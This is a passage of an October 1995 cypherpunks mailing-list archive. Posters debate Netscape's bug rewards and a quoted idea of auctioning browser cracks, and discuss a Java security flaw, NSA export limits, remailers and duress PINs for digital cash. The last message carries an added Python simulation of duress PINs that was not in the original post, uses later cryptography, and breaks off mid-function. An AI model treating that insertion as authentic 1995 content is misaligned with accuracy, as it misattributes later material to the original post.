>If a linux user finds a security hole that only applies to linux,
>I don't know what the company would do, but I would push for them
>being paid as well.

If you look at what versions are eligible for rewards of any sort, Linux is
not on the list.  Was it an oversight or are they only eligible for the
security cash?


|       Visualize a world without lawyers!        | alano@teleport.com   |
|"The moral PGP Diffie taught Zimmerman unites all| Disclaimer:          |
| mankind free in one-key-steganography-privacy!" | Ignore the man       |
|   -- PGP 2.6.2 key available on request --      |  behind the keyboard.|
|         http://www.teleport.com/~alano          |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Mon, 16 Oct 95 19:28:39 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape rewards are an insult
Message-ID: <199510170227.TAA27532@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


>         The idea that Netscape (like Microsoft) thinks they can get free
> testing services from all over the net by real experts just by offering
> a tee shirt is downright offensive.
> 
>         I have a better idea.  How about an open market in break-in
> software.  We crack Netscape and offer the crack code to the highest
> bidder.  Bids start at US$25K per hole.  For the insult, Netscape has to
> outbid the competition by a factor of 2 to get the details of the hole.
> Here's how it works:

      [snip of judging, verification, bidding ...]

Hmmm.  I'm glad that some people still have a bit of a sense of haha about
these things.  It's only computer code, right?? 

Right??  ;-(

Your idea about a bidding war for this type of code is _interesting_ but
not something I'd really like to see develop.  Good security and good code
are possible without this. 

Good people are out there.  The *best* people might be in academia or they
might be in retirement or even on a sabbatical.  They might even be in
other fields, or other countries, or as Netscape discovered to its
chagrin, they might be Berkeley students.  The question is how to secure
co-operation when they aren't motivated by ego, need, or greed. 

How do you attract the ones who simply know who they are, and WHAT they
can do, and simply won't put up with twaddle?? 

And frankly offering someone a cup, or a shirt or even offering someone a
$1,000 isn't the way to bring them on side.  I can't even get my
lineprinter serviced on Christmas Eve for $1,000. 

There's always a fine line between an insult and an offer. 

>         I have an even better idea.  How about if Netscape gets some
> competent programmers with real security expertise, adds in some good
> change controls, a serious internal testing program, quality control ala
> ISO-9000, internal IT auditors, external IT auditors, training and
> education for their employees, and everything else it takes to be in the
> software business in a serious way.

This would be a *basic* start.  Whether or not ISO-9000 is the way to go,
or whether it should be TQM, or something more modern is moot.  In
addition to some of the above, I might suggest parallel development units. 

Two separate program teams kept completely apart from each other, each
duplicating the other's work with the eventual goal of utilizing the first
reconciliation sets of production code as "learning experience", and then,
as part of a planned design goal re-evaluation and refinement, disposing
of the reconciliation set before "Fresh-Start"(TM) implementation. 

(This might necessarily lead to attendant presentation of individual
outplacement opportunities to select persons, as a team regrouping
component.)

Essentially a real-life simulation of the anticipated code-writing
process. 

Each group could develop its own unique vision and approach within the
context of the design goal, and should have demonstrated a willingness to
utilize challenge and justification modelling.  The groups themselves
might be dynamically balanced and re-balanced vis-a-vis personality and
code-writing styles. 

A positive creative environment should be provided, possibly in an
incubator-type setting, which meets creative, psycho-social, and
psycho-physical requirements. 

Essentially, the right balance between spa and boot-camp, a realized
vision.  An evolutionary development of Scott Adams' "Vision: Empowered
Employees Working Toward A Common Plan". 

A plan that centers around People. 

A New Plan that views employees as assets to be developed, nurtured, and
cared for rather than as expenses to be eliminated or reduced. 

A New Vision emphasizing Quality by remedying the marginalization of the
company's prime assets -- the employees.  An applied corrective ...  a
focussed deemphasis on productivity in anorectic organizations.  I might,
humbly, suggest as a title: 

 A New Vision, A New Plan:  Applied Complexity Theory (A.C.T.) in Action.

It truly is a long list ... as part of an "ACT in Action Plan"(TM),
Netscape should source long-range planners who can meet and exceed
day-to-day corporate expectations. 

>         As an alternative, we could help them contact the shareholders
> for a lawsuit.  After all, they are a public company now and are responsible
> to the shareholders for the value of their stock.  If it goes down because
> they aren't doing an adequate job of software quality control, the officers
> may be personally liable.

I think whether or not it goes down, is not relevant.  If there has been
proper material event disclosure, then I doubt that there are actionable
grounds.  If there have been active acts of misrepresentation, then that's
simple fraud. 

Fiduciary obligations can be very complex without good counsel. 

Clearly by not having official announcements, it might lead a reasonable
man to believe that there might be trading improprieties through-out the
high-tech sector, among so-called "friends and family" or alternatively,
that Netscape's strategic misrepresentation program might be operative. 

Who knows??

One thing is certain though, disclosure obligations attach to all public
companies.  Sun, Microsoft, Netscape, AT&T, Viacom ... 

Maybe I should email postmaster??



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Josh M. Osborne" <stripes@va.pubnix.com>
Date: Mon, 16 Oct 95 16:51:36 PDT
To: bshantz@nwlink.com
Subject: Re: Netscape rewards are an insult
In-Reply-To: <9510151627.AA15802@toad.com>
Message-ID: <TAA25593.199510162351@garotte.va.pubnix.com>
MIME-Version: 1.0
Content-Type: text/plain


In message <9510151627.AA15802@toad.com>, "Brad Shantz" writes:
[the stuff with ">>" is mine]
>> Note well: Netscape is offering this reward for finding bugs in *beta*
>> release code.  In other words the code that they *know* crashes, code
>> that they suspect has security related bugs, code that they don't think
>> is (yet) good enough to charge a measly $40 for!
>
>Whoops, wrong.  BETA does not mean code "they know crashes."  In fact 
>it is quite the opposite.  This is pre-release code that they are bug 
>fixing.  most of the catastrophic bugs, they probably know about.

I would agree that they know about many catastrophic bugs, perhaps
even most, perhaps not.  That doesn't mean they have been fixed.

I have been involved in a fair number of beta test programs (as a
tester for the company releasing the product, as a programmer for
the company releasing the product, and as a user receiving the
product to be tested).  Most had catastrophic bugs (varying from
crashing for programs written in C, to kicking you out of the run
time environment for programs written in APL) that were known about
when the product was shipped to testers.  The others we had absolutely
no doubt that such bugs would be found by testers.

Perhaps Netscape is different, but I don't see why they would be.
Certainly I can make Netscape 2.0b1 crash, and I doubt people at
Netscape were foolish enough to think that it wouldn't.

>BETA program is to increase the testing and quality assurance staff 
>to find all of the bugs they DON'T know about.  Then, they will have a 
>reasonable amount of time to fix those bugs before release.  It makes 
>for a much more stable product.

Yes the principal reason for having a Beta is to find bugs you don't
know about.  That does *not* mean you need to remove all known bugs
before you start the Beta ('tho it does cut down on the number of
duplicate reports - many testers fail to read the known bug list).

There are also some less noble reasons to have a Beta (like the
PERT chart says the Beta starts October 8th or the project will
start to slip, and many more).  There is no real evidence that
this applies to Netscape so I won't go into them.

[...talks about SPRY/Compuserve and Logos Research and Microsoft's
beta programs...]
>Anyway, I see Netscape's move to paying for beta testing will result 
>in a more stable browser, and hopefully more secure software.

Yes, and this would be different from my point of view in what way?
(i.e. I agree and wonder why you bothered to mention it)

>> If they don't get buried in bad press for this, I would guess that they
>> may have a different program with a different set reward for finding bugs
>> in their for-sale version.  
>
>Why would they get bad press?

Well a number of people on this list seem to be pooh-poohing the reward
program.  Rightfully or not that could generate bad press.  Also
reporters have their own set of thought processes and may decide this
is bad for some reason.  Or not.

>> Besides nobody said you have to report your bugs to Netscape just because
>> they gave you free software and offered some sort of reward for finding
>> bugs.  If you don't think the "pay" (including the possibility of having
>> the software fixed) is high enough, don't report the bugs.
>
>Once again, Josh, I'm afraid I have to disagree with you on this one. 

Ok, go ahead.

> Especially in regards to secure software.  I see your point, but...
>Whether or not you have to report the bugs is immaterial.  Netscape 
>is doing a service by making their app available for testing before 
>saying "this is secure."  As a person who does business over the net, 

(I'm not sure they have ever gone out and said the Beta software isn't
secure.  Hopefully people realise that beta code doesn't always do
everything it hopes to, and will not assume it is secure just because
it has a goal of being secure.)

>if I found out that my software was NOT secure, I would seek either a 
>secure update or another company's software.  If  I'm happy with 
>Netscape's software, I'll report the bugs to improve its quality.  
>In my humble opinion, improving the software is reward enough.  Very 
>few companies have paid beta programs.

Again I agree.  In fact I think the $0 they were paying before the
reward program was enough that I sent in reports on anything I could
reproduce.

You haven't done a very effective job of disagreeing with me.  I
said Netscape offers you X in exchange for Y, and if X isn't enough
for you to want to do Y, then don't do Y.  You said X is a very
good offer for Y, and you intend to take them up on it.  The two
are not mutually exclusive (in fact the two views are somewhat
supportive of each other).  

Which one of us doesn't understand the other?

[...]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stevenw@iglou.com (Steven Weller)
Date: Mon, 16 Oct 95 20:33:59 PDT
To: cypherpunks@toad.com
Subject: Empennage Seminar -- Sun Microsystems
Message-ID: <v01530508aca8def27b2b@[206.86.1.35]>
MIME-Version: 1.0
Content-Type: text/plain


Seen on ba.seminars and posted here:


              Mathematical Sciences Research Institute
                          Empennage Seminar


                   An Introduction to Cryptopolitics

                          Whitfield Diffie
                          Sun Microsystems
                     Mountain View, California

    Some years ago, Andy Gleason observed that during World War II,
the physicists had discovered that what they did had an impact on the
real world and that now it was the mathematicians' turn.

    The talk will explore why seemingly arcane technology has become
a political football.  We will examine the significance of
communications privacy in human affairs, how communications
intelligence functions, and how cryptography affects that functioning.
In the process we will look at a variety of proposals for controlling
cryptography and the possible impact of those proposals on
intelligence, law enforcement, commerce, and the personal life.

            2 PM, Tuesday October 24, 1995, MSRI Lecture Hall

Next Month:

Scott Mitchell, Sandia National Laboratories, on hexahedralization

#####################################################################

About Empennage

        As part of our effort to build bridges between Mathematics and the
larger world, the Mathematical Sciences Research Institute is sponsoring
a seminar where mathematicians can meet adventurers on the technological
frontier. The Empennage Seminar will meet in the MSRI lecture hall
Tuesday afternoons from 2 to 3.

        The seminar is intended to bring together not only scientists
from the Bay Area involved directly with mathematical computing, but
also people involved in envisioning and implementing new technologies,
people concerned with the social and political ramifications of the
development of information technology, and people working on problems,
the formal nature of which brings them close to mathematics. The
seminar is aimed at breaking down the walls which in this century
have isolated mathematics from intellectual life outside of its own
tradition.

        While the Empennage seminar is still in its infancy, we have
begun to attract an audience beyond MSRI, including scientists from
other institutions and disciplines, both within and without academe.
If you have any recommendations for possible speakers, please let me
know. Also, anyone interested in attending should contact me:
Joe Christy, joe@msri.org, (510)643-6069.

About MSRI

        The Mathematical Sciences Research Institute (MSRI) is an
independently funded research institute located on the UC Berkeley
campus, high above the Lawrence Hall of Science. At any given time,
MSRI is host to 50 to 100 post-doctoral fellows and more senior
researchers who come from all over the world for periods of a week to
a year. Most of them participate in one of two topical programs which
change from year to year, with a smaller group in "Area III", our
catch-all. Currently the programs are Holomorphic Spaces and
Several Complex Variables.

        MSRI is aiming to become a model site for the integration of
computing into mathematical research. In practical terms this means
not only the development and use of software for numerical
calculation, symbolic manipulation, and geometric visualization, but
also exploration of the uses of technology in other areas of scholarly
life. This includes network access and distribution of structured
information, new modes of scholarly communication (incorporating Email,
formatted and illustrated mathematical text, and shared interactive
software for experimental mathematics), and the development of software
engineering tools necessary to put the creation of useful, shareable
special purpose software within the reach of the average individual
scientist.

Directions to MSRI are available at the URL:
http://www.msri.org/housing/info/howtoget.html

About the word "empennage"

Empennage is the French word for fletching - the act of putting
feathers on the tail of an arrow. This makes the arrow fly straighter
by giving it a spin.

-------------------------------------------------------------------------
Steven Weller                      |  "The Internet, of course, is more
+1 415 390 9732                    |  than just a place to find pictures
                                   |  of people having sex with dogs."
stevenw@iglou.com                  |       -- Time Magazine, 3 July 1995






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Mon, 16 Oct 95 20:34:53 PDT
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: transaction costs in anonymous markets
In-Reply-To: <Pine.SUN.3.91.951016074023.1719B-100000@crl.crl.com>
Message-ID: <Pine.SOL.3.91.951016203438.582A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 16 Oct 1995, Sandy Sandfort wrote:

> 
> This is only true if you assume everyone will do their own
> reputation evaluation.  This is a third-party insurer problem,
> really.  Either a "Lloyds of London" or a "Good Housekeeping" 
> model would do the trick.
> 

Actually, this sounds a lot closer to someone like S&P or some other 
rating agency.

Simon

------
(defun modexpt (x y n)  "computes (x^y) mod n"
  (cond ((= y 0) 1)   ((= y 1) (mod x n))
	((evenp y) (mod (expt (modexpt x (/ y 2) n) 2) n))
	(t (mod (* x (modexpt x (1- y) n)) n))))






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "P.J. Ponder" <ponder@wane-leon-mail.scri.fsu.edu>
Date: Mon, 16 Oct 95 18:19:07 PDT
To: williams@va.arca.com
Subject: Security Spectra
Message-ID: <Pine.3.89.9510162030.C20974-0100000@wane3.scri.fsu.edu>
MIME-Version: 1.0
Content-Type: text/plain


In your recent post to the cypherpunks mailing list you proposed a 
taxonomy of security weaknesses and vulnerabilities, adding that these 
may be perhaps categorized and ranked.  Standard practice in the computer 
and communications security business has for many years been based on the 
idea of risk analysis.  More or less systematic approaches to risk 
analysis have been put forward over the years.  One example is FIPS Pub 
65 which attempted to systematize risk analysis and ideally lead one to a 
quantified level of risk at the end.  The method was too burdensome to be 
effective, and most people today use a more qualitative approach.

The whole idea of categorizing or ranking holes and vulnerabilities ab 
initio, outside of their contextual application to a real system is not 
very helpful.  Systems vary so widely in their criticalities, 
sensitivities, costs, etc., that each of your pre-defined categorized 
weaknesses would have to be rejudged - in the context of the system being 
analyzed - to determine how, and to what extent it could affect the system.

For example, a system with a weakness in logging events would be a disaster 
in a busy commercial transactional system that may need logs to recover 
from errors or to trace mischievous actions.  Another system, however, 
may find the lack of effective logging an inconvenience at worst (maybe 
even a plus, if the Pennsylvania cops are at the door).  The standard 
approach as I understand it is to analyze the system against all the 
known vulnerabilities and attempt to measure (maybe only qualitatively) 
the risks associated with the vulnerabilities.  I think analyzing holes 
by themselves, outside of any context, is a good academic exercise, and 
may lead to useful knowledge that people analyzing real systems can use, 
but it is not an advantage to attempt to grade them in the abstract.

--
PJ

you'll probably get lots more useful advice from others more articulate 
than I, but I hadn't posted to the list in awhile and am curious about 
how all these bounce messages everyone is talking about. Are there lots 
others besides the guy with 1000 messages in his mailbox?  I guess I'll
see.....




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Mon, 16 Oct 95 18:31:58 PDT
To: cypherpunks@toad.com
Subject: PGP article in American Survival Guide
Message-ID: <Pine.SOL.3.91.951016212341.571F-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain


There's a brief intro article re. PGP in the issue of *American Survival 
Guide* which is currently on the stands.

ASG has a sort of cammo-right orientation, FWIW.

bd





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: AFDA2@aol.com
Date: Mon, 16 Oct 95 20:46:41 PDT
To: lindat@iquest.net
Subject: Seminar
Message-ID: <951016233125_125652326@emout04.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


A quick update on the Association's upcoming seminar.

As many of you know, on Saturday, November 4, 1995, the Association of
Federal Defense Attorneys (AFDA) will be presenting a one-day seminar for
defense attorneys entitled, "What Every Defense Attorney Should Know About
The Federal Bureau of Prisons."  The seminar will be held at the Los Angeles
Airport Marriott Hotel, from 9:00 a.m. - 4:30 p.m.  


The purpose of the program is to provide defense attorneys with two avenues
of insight into BOP. The first, which covers the morning and part of the
afternoon, focuses on the administrative/policy-oriented makeup of the
agency, and the defense attorney's strategic application of these rules.
 Speakers from the BOP, private defense bar and Federal Public Defenders
Office will cover the following subjects: 

1. Types of BOP facilities, including the key operating features of the USP,
FCI and camp.

2. The flow chart of key players in BOP administration that attorneys should
be familiar with, including the Community Corrections Manager, Community
Corrections Staff, Regional Designator, and the legal offices at the various
facilities and regional offices such as Dublin, Ca.

3. The BOP documentation system, which has its own unique classification and
numbering system.  This topic includes special attention to the key documents
most likely to affect defense attorneys, such as Program Statements,
Operations Memoranda, and Directives.

4. The key BOP terms that attorneys should be familiar with in order to
communicate more effectively with staff and understand better the agency's
documentation.

5. How to anticipate where the defendant will serve his/her sentence and
secure a favorable outcome (to the degree possible).  This subject includes:

Designation of place of confinement
Custody classification
Institutional transfer and redesignation

6.  Sentence computation (calculating release dates)
7. How to efficiently contact appropriate staff on matters of concern
8. Intensive Confinement Centers (boot camp)
	
     The second prong of the seminar, which covers about two hours in the
afternoon, focuses on the "grass-roots" perspective of the federal inmate, in
terms of basic facts about federal incarceration that lawyers need to pass on
to their clients before the clients are designated to a facility.  The
speakers will be two former inmates who have done time at camps and FCIs.  

If you would like a fax-flyer for the program, email us a short note at
AFDA2@AOL.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an407769@anon.penet.fi (jerry the golden retriever)
Date: Tue, 17 Oct 95 00:19:40 PDT
To: cypherpunks@toad.com
Subject: java flaw
Message-ID: <9510170659.AA29634@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain


Sun and Netscape fix Java-Navigator flaw

From PC Week for October 16, 1995 by Michael Moeller

Netscape Communications Corp. has identified a flaw in Sun Microsystems
Inc.'s Java development language that caused a security hole in
Netscape's Navigator 2.0 Internet browser.

The flaw left open the possibility for corrupted files or viruses to be
downloaded over the Internet to a host PC.

Netscape officials, in Mountain View, Calif., said the problem occurred
when porting Java to the Netscape platform.

Sun, also based in Mountain View, issued a fix that performs a tighter
security scan of Java applets, or portions of code. Sun officials said
no users were affected by the security flaw.

The company is beta testing Java now, and the final version is scheduled
to be released next month.

Ironically, Java was designed as a secure development language to
prevent users from contracting a virus when downloading an application
over the Internet.

With Java, World-Wide Web application developers can create applets that
are turned into full-scale application code once downloaded by a Java-
enabled browser.

A security feature in Java scans for viruses before activating the
applet.

Java applications are designed to be run within the secure environment
of a Java-enabled browser.

When Java was ported to Netscape, one of the security features "fell
through the cracks," said Arthur van Hoff, senior staff engineer at Sun
and a principal architect of Java.

As a result, a user could have downloaded a corrupt applet that could
have continued to function outside the secure environment of the browser
shell and infected other programs on a user's computer.

Netscape has since released two new versions of its Navigator 2.0
browser for beta testing, one with Java support and one without.

However, Netscape officials said that once the browser is released in
mid-December, all versions of Navigator 2.0 will be Java-enabled.

--****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION***
Your e-mail reply to this message WILL be *automatically* ANONYMIZED.
Please, report inappropriate use to                abuse@anon.penet.fi
For information (incl. non-anon reply) write to    help@anon.penet.fi
If you have any problems, address them to          admin@anon.penet.fi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Tue, 17 Oct 95 08:05:25 PDT
To: cypherpunks@toad.com
Subject: Re: java flaw
Message-ID: <199510171504.IAA17210@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 06:59 AM 10/17/95 UTC, jerry the golden retriever wrote:
> A security feature in Java scans for viruses before activating the
> applet.

I hope that this is false.

Even if one had genuine artificial intelligence, it would be impossible
to detect all viruses, only particular viruses and classes of virus.

If Java is secure, virus scanning should be unnecessary, indeed 
impossible, because there could be no code configuration capable
of acting as a virus.

If virus scanning occurs, then it is possible to write a virus in Java,
then Java is inherently insecure.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 17 Oct 95 06:13:48 PDT
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: The NSA Visits Compendium
Message-ID: <199510171312.JAA15286@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:05 PM 10/16/95 -0700, Vladimir Z. Nuri wrote:
>a study on this would be very significant. (from what I understand, the NSA
>tried to do this with public key crypto, i.e. suppress it at the
>publication stage. a professor gave a lecture on this in one of my
>classes and said that it was even covered in the NYT at the time.
>unfortunately I lost the date. I believe it was a long time ago
>(maybe the 80's or even the 70's). hopefully someone else has an
>encyclopedic brain.

1977/1978.  "A Proposal for a Public Key Encryption System."  IEEE meeting.
Imprisonment threat by letter.  Mathematical Games column in Scientific
American.  3,000 copies of paper distributed free by MIT.

>unfortunately, whenever someone says, "don't name my company", it loses
>effectiveness. I would like to point out that people are directly contributing
>to their erosion of rights by this behavior that suggests that they
>doing something lawbreaking that they are ashamed of.

One should always suggest to investigating authorities that they show a
warrant or get lost.  "Quo warranto"?  It is rarely useful to chat with them.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 17 Oct 95 06:17:05 PDT
To: DMiskell@envirolink.org
Subject: Re: Weekly MixMaster list
Message-ID: <199510171316.JAA15754@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At , Daniel Miskell wrote:
>
>What is the MixMaster list, and what is it for?
>Apologies on my newbie status.
>
>Munster

Mixmaster is a modern remailer protocol which breaks packets up into
standard sizes and shuffles them among active remailers to make traffic
analysis impossible.

The list lists active mixmaster remailers.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Loofbourrow <loofbour@cis.ohio-state.edu>
Date: Tue, 17 Oct 95 06:54:28 PDT
To: cypherpunks@toad.com
Subject: Re: mental cryptography
In-Reply-To: <199510141243.IAA27588@hammond.cis.ohio-state.edu>
Message-ID: <199510171354.JAA13063@colon.cis.ohio-state.edu>
MIME-Version: 1.0
Content-Type: text/plain


Scott Brickner writes:
 > Nathan Loofbourrow writes:
 > >It may be that the approach is off anyway. Credit cards have only
 > >signature verification -- if the salesperson bothers -- because stolen
 > >cards are reported. You don't need a strong authentication technique
 > >if a stolen card is easy to cancel.
 > 
 > The card's easy to cancel, but the cash ain't.  Credit cards are
 > cleared with the issuer.  Digital cash with smart cards acting as
 > transaction observers don't need this.  The thief need only transfer
 > the cash from the stolen card to his own, just like he does with
 > regular cash.

Er, um, right.

Well, then, perhaps on-line systems need to consider cash
revocation in case of theft. Actually, this is a no-brainer: just
exchange the cash for some new coin, and the old stuff goes
invalid. Admittedly, this means a footrace for the mugger and the
victim, so I guess the mugger is encouraged to knock you out cold.

Maybe you just shouldn't carry too much cash with you. Gee, that
sounds like good advice even without digital protocols.

 > >Even with a weak PIN system for authentication, you can always provide
 > >a "duress" PIN, right?
 > 
 > Sounds like a better choice.

Duress PINs liberally sprinkled through the keyspace also drop the
efficacy of brute-force PIN search for the thief.

nathan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andy Brown <asb@nexor.co.uk>
Date: Tue, 17 Oct 95 02:32:37 PDT
To: Peter Wayner <pcw@access.digex.net>
Subject: Re: The NSA Visits Compendium
In-Reply-To: <aca849e3050210043eb7@[199.125.128.5]>
Message-ID: <Pine.SOL.3.91.951017102059.25411F-100000@eagle.nexor.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 16 Oct 1995, Peter Wayner wrote:

> [...]
> The most interesting thing that he mentioned was that the company had to
> guarantee that the data would never be encrypted sequentially by two 
> _different_ algorithms. Apparently double encryption by 40-bit RC-4 was 
> okay, but using different algorithms was verboten.

Very interesting indeed.  With RC4 the bulk of the time is in key setup, 
so if they could do two setups in parallel then the total time to search 
a double-encrypted 40 bit keyspace would not be that great.

I suppose they could even 'weight' the number/power of processors assigned
to key setup such that the setup ran as fast as the trial decryptions,
then just proportionally increase their number until you get an acceptable
search time.  I know precious little about parallel processing so this
could be idle speculation. 

Can the same parallelisation be applied to other popular ciphers?


- Andy

+-------------------------------------------------------------------------+
| Andrew Brown  Internet <asb@nexor.co.uk>  Telephone +44 115 952 0585    |
| PGP (2048/9611055D): 69 AA EF 72 80 7A 63 3A  C0 1F 9F 66 64 02 4C 88   |
+-------------------------------------------------------------------------+





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1018954@aix2.uottawa.ca
Date: Tue, 17 Oct 95 08:22:13 PDT
To: Nathan Loofbourrow <loofbour@cis.ohio-state.edu>
Subject: Re: mental cryptography
In-Reply-To: <199510171354.JAA13063@colon.cis.ohio-state.edu>
Message-ID: <Pine.3.89.9510171019.A61417-0100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 17 Oct 1995, Nathan Loofbourrow wrote:

> Well, then, perhaps on-line systems need to consider cash
> revocation in case of theft. Actually, this is a no-brainer: just
> exchange the cash for some new coin, and the old stuff goes
> invalid. Admittedly, this means a footrace for the mugger and the
> victim, so I guess the mugger is encouraged to knock you out cold.
 (snip)
> Duress PINs liberally sprinkled through the keyspace also drop the
> efficacy of brute-force PIN search for the thief.
> 
Besides (if you *really* want to be paranoid) you'd still have
that cash on your hard drive and several other smart cards. Assuming you 
record which cash you put onto which smartcard onto your database or 
whatever, you'd exchange the stolen cash with the bank before brute force 
would succeed. Mugger still gets stuck with a duress code.

Either you have an automated paranoia setup that constantly changes 
your net worth into new currency (rejuvenating your cash against aging 
by factoring) or yeah, it really is better for the mugger to get rid of you. 
This also protects against the Chinese lottery attacks some people on the
list are trying to set up (assuming it really is ubiquitous by then).
It really might become a lottery with ecash. Factor PINs (assuming they're
small enough) and make real money.

This could easily be part of an automated trading program of the kind 
used by stock brokers. You'd probably use it anyway if the currency market 
were totally digital (low, if not no transaction fees) to compensate for 
currency fluctuations. Private currencies might be very volatile. Hell, if any 
of this succeeds, government currencies would be extremely volatile. 

Gold might start looking good again. (though platinum's better, almost all 
the world's platinum's in South Africa and odds are no one's gonna find any new
sources. Anyone know if I'm totally wrong? I'm no economist.)

(waiting to see if ala.usmc.mil is going to send more bouncemail)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Zamick <JonathanZ@consensus.com>
Date: Mon, 16 Oct 95 11:19:57 PDT
To: an402976@anon.penet.fi
Subject: Re: Netscape rewards are an insult
Message-ID: <v02120d04aca9a22a508b@[157.22.240.13]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:11 AM 10/16/95, RingZero wrote:
>======
>On Sat, 14 Oct 1995, Henry Wertz wrote:
>
>On Sat, 14 Oct 1995, Dr. Frederick B. Cohen wrote:
>
>>       The idea that Netscape (like Microsoft) thinks they can get free
>> testing services from all over the net by real experts just by offering
>> a tee shirt is downright offensive.
>>
>>       I have a better idea.  How about an open market in break-in
>> software.  We crack Netscape and offer the crack code to the highest
>> bidder.  Bids start at US$25K per hole.  For the insult, Netscape has to
>> outbid the competition by a factor of 2 to get the details of the hole.
>> Here's how it works:
>*cut*
>     You know, this all seems kind of greedy to me.. It used to be people
>would find holes for *fun* and not for profit.  It's still possible to do
>that you know 8-).
>======
>
>It almost sounds like extortion, doesn't it?


I have to admit I'm a little surprised. I think there are a couple conflicting
dynamics here.

On the one hand, many people here see strengthening security and encryption
in use as a no-holds benefit. The more that is out there, the better it is,
and the more it's in use, the better off things will be.

On the other hand, Netscape is a hot stock company. It's ok to work for
recognition, and to donate time for the betterment of the community even if
it profits others. (Eventually such things come around, which is the
classic value of a net reputation.) However, when sudden, large profits
hinge on your work, it is harder to take the philosophical route.

It's a tough thing. I can certainly see both sides.

Jonathan

------------------------------------------------------------------------
..Jonathan Zamick                    Consensus Development Corporation..
..<JonathanZ@consensus.com>                      1563 Solano Ave, #355..
..                                             Berkeley, CA 94707-2116..
..                                        o510/559-1500  f510/559-1505..
..Mosaic/WWW Home Page:                                               ..
..  Consensus Home Page  ..






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1018954@aix2.uottawa.ca
Date: Tue, 17 Oct 95 08:32:41 PDT
To: Nathan Loofbourrow <loofbour@cis.ohio-state.edu>
Subject: Duress codes
In-Reply-To: <199510171354.JAA13063@colon.cis.ohio-state.edu>
Message-ID: <Pine.3.89.9510171136.E61417-0100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 17 Oct 1995, Nathan Loofbourrow wrote:

> Duress PINs liberally sprinkled through the keyspace also drop the
> efficacy of brute-force PIN search for the thief.
Was there an actual protocol for doing this? (probabilistic maybe?)
Don't remember Schneier doing anything beyond just mentioning it. (ok I
can't find the page number either, so I can't really complain).
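
[Added example, not part of the original post or of any published protocol.] One way the "duress PINs sprinkled through the keyspace" idea from this thread could be built and measured: a wrong PIN counts as a duress PIN when a keyed hash of it is divisible by one_in. The HMAC-SHA256 rule, the 4-digit PIN space and every function name below are assumptions made for illustration.

```python
import hashlib
import hmac
import random
from fractions import Fraction

PIN_DIGITS = 4                      # assumption: 4-digit decimal PINs
PIN_SPACE = 10 ** PIN_DIGITS


def classify(card_secret, real_pin, candidate, one_in):
    """Return 'accept', 'duress' or 'reject' for a candidate PIN.

    Hypothetical rule: a wrong PIN is a duress PIN when a keyed hash of it is
    divisible by one_in, so roughly 1/one_in of the keyspace is duress and the
    set cannot be predicted without card_secret.
    """
    if hmac.compare_digest(candidate.encode(), real_pin.encode()):
        return "accept"
    tag = hmac.new(card_secret, candidate.encode(), hashlib.sha256).digest()
    return "duress" if int.from_bytes(tag[:8], "big") % one_in == 0 else "reject"


def all_pins():
    """Every PIN in ascending order, zero-padded."""
    return (f"{i:0{PIN_DIGITS}d}" for i in range(PIN_SPACE))


def duress_count(card_secret, real_pin, one_in):
    """Number of duress PINs this card actually has."""
    return sum(classify(card_secret, real_pin, p, one_in) == "duress"
               for p in all_pins())


def thief_success_probability(d):
    """Of the real PIN and the d duress PINs, each is equally likely to be the
    first one a blind search reaches, so the search wins with chance 1/(d+1)."""
    return Fraction(1, d + 1)


def typo_alarm_probability(d):
    """Cost of the scheme: chance that an owner's uniformly random mistyped
    PIN lands on a duress PIN and raises a false alarm."""
    return Fraction(d, PIN_SPACE - 1)


def simulate_sequential_search(trials, one_in, seed):
    """Fraction of constructed cards on which a 0000-upward search reaches the
    real PIN before it trips any duress PIN."""
    rng = random.Random(seed)
    wins = 0
    for _ in range(trials):
        secret = rng.getrandbits(128).to_bytes(16, "big")
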